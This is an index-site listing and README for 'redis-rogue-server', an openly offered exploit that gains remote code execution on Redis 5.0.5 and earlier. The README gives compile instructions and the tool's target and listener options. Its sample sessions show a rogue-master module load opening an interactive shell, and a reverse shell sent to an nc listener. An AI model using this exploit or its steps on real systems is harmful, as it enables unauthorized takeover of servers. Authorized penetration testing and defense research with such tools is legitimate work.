Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/n0b0dyCN/redis-rogue-server
Redis(<=5.0.5) RCE
https://github.com/n0b0dyCN/redis-rogue-server
rce redis
Last synced: 21 days ago
JSON representation
Redis(<=5.0.5) RCE
- Host: GitHub
- URL: https://github.com/n0b0dyCN/redis-rogue-server
- Owner: n0b0dyCN
- License: apache-2.0
- Created: 2019-07-07T17:39:37.000Z (over 5 years ago)
- Default Branch: master
- Last Pushed: 2023-09-24T01:43:52.000Z (about 1 year ago)
- Last Synced: 2024-08-05T17:24:59.415Z (4 months ago)
- Topics: rce, redis
- Language: C
- Homepage:
- Size: 237 KB
- Stars: 966
- Watchers: 7
- Forks: 192
- Open Issues: 4
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-hacking-lists - n0b0dyCN/redis-rogue-server - Redis(<=5.0.5) RCE (C)
README
# Redis Rogue Server
A exploit for Redis(<=5.0.5) RCE, inspired by [Redis post-exploitation](https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf).
__Support interactive shell and reverse shell!__
## Requirements
Python 3.6+
If you want to modify or recompile the redis module, you also require `make`.
## Usage
Compile exploit:
``` bash
cd RedisModulesSDK/exp/
make
```Copy the .so file to same folder with `redis-rogue-server.py`.
```
➜ ./redis-rogue-server.py -h
______ _ _ ______ _____
| ___ \ | (_) | ___ \ / ___|
| |_/ /___ __| |_ ___ | |_/ /___ __ _ _ _ ___ \ `--. ___ _ ____ _____ _ __
| // _ \/ _` | / __| | // _ \ / _` | | | |/ _ \ `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \ __/ (_| | \__ \ | |\ \ (_) | (_| | |_| | __/ /\__/ / __/ | \ V / __/ |
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_| \_/ \___|_|
__/ |
|___/
@copyright n0b0dy @ r3kapigUsage: redis-rogue-server.py [options]
Options:
-h, --help show this help message and exit
--rhost=REMOTE_HOST target host
--rport=REMOTE_PORT target redis port, default 6379
--lhost=LOCAL_HOST rogue server ip
--lport=LOCAL_PORT rogue server listen port, default 21000
--exp=EXP_FILE Redis Module to load, default exp.so
-v, --verbose Show full data stream
```## Example
### Interactive shell
```
➜ ./redis-rogue-server.py --rhost 127.0.0.1 --lhost 127.0.0.1
______ _ _ ______ _____
| ___ \ | (_) | ___ \ / ___|
| |_/ /___ __| |_ ___ | |_/ /___ __ _ _ _ ___ \ `--. ___ _ ____ _____ _ __
| // _ \/ _` | / __| | // _ \ / _` | | | |/ _ \ `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \ __/ (_| | \__ \ | |\ \ (_) | (_| | |_| | __/ /\__/ / __/ | \ V / __/ |
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_| \_/ \___|_|
__/ |
|___/
@copyright n0b0dy @ r3kapig[info] TARGET 127.0.0.1:6379
[info] SERVER 127.0.0.1:21000
[info] Setting master...
[info] Setting dbfilename...
[info] Loading module...
[info] Temerory cleaning up...
What do u want, [i]nteractive shell or [r]everse shell: i
[info] Interact mode start, enter "exit" to quit.
[<<] whoami
[>>] :n0b0dy
[<<]
```### Reverse shell
Invoke reverse shell:
```
➜ ./redis-rogue-server.py --rhost 127.0.0.1 --lhost 127.0.0.1
______ _ _ ______ _____
| ___ \ | (_) | ___ \ / ___|
| |_/ /___ __| |_ ___ | |_/ /___ __ _ _ _ ___ \ `--. ___ _ ____ _____ _ __
| // _ \/ _` | / __| | // _ \ / _` | | | |/ _ \ `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \ __/ (_| | \__ \ | |\ \ (_) | (_| | |_| | __/ /\__/ / __/ | \ V / __/ |
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_| \_/ \___|_|
__/ |
|___/
@copyright n0b0dy @ r3kapig[info] TARGET 127.0.0.1:6379
[info] SERVER 127.0.0.1:21000
[info] Setting master...
[info] Setting dbfilename...
[info] Loading module...
[info] Temerory cleaning up...
What do u want, [i]nteractive shell or [r]everse shell: r
[info] Open reverse shell...
Reverse server address: 127.0.0.1
Reverse server port: 9999
[info] Reverse shell payload sent.
[info] Check at 127.0.0.1:9999
[info] Unload module...
```Receive reverse shell:
```
➜ nc -lvvp 9999
Listening on [0.0.0.0] (family 0, port 9999)
Connection from localhost.localdomain 39312 received!
whoami
n0b0dy
```## Thanks
* [RicterZ](https://github.com/RicterZ)'s redis exec module: